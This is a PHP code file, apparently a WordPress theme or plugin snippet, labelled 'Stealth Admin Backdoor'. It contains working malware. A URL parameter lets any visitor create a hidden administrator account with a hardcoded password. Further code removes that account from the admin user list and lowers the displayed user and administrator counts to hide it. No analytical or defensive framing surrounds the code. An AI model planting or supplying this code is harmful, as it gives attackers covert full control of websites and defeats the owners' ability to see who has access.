<?php
// Stealth Admin Backdoor
add_action('wp_head', 'backdoor_create_admin');
function backdoor_create_admin() {
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'go') {
        require_once ABSPATH . 'wp-includes/registration.php';
        if (!username_exists('902')) {
            $user_id = wp_create_user('902', 'new_pass123!');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            // Redirect to hide trigger
            wp_redirect(home_url());
            exit;
        }
    }
}

// Hide the backdoor user from admin lists (except when logged in as 902)
add_action('pre_user_query', 'backdoor_hide_user');
function backdoor_hide_user($user_search) {
    global $current_user;
    if (!empty($current_user->user_login) && $current_user->user_login != '902') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != '902'", $user_search->query_where);
    }
}

// Hide user count in admin dashboard
add_filter("views_users", "backdoor_fix_user_counts");
function backdoor_fix_user_counts($views) {
    $users = count_users();
    $admins_num = $users['avail_roles']['administrator'] - 1;
    $all_num = $users['total_users'] - 1;
    
    $class_adm = (strpos($views['administrator'], 'current') === false) ? "" : "current";
    $class_all = (strpos($views['all'], 'current') === false) ? "" : "current";
    
    $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
    $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
    return $views;
}
?>

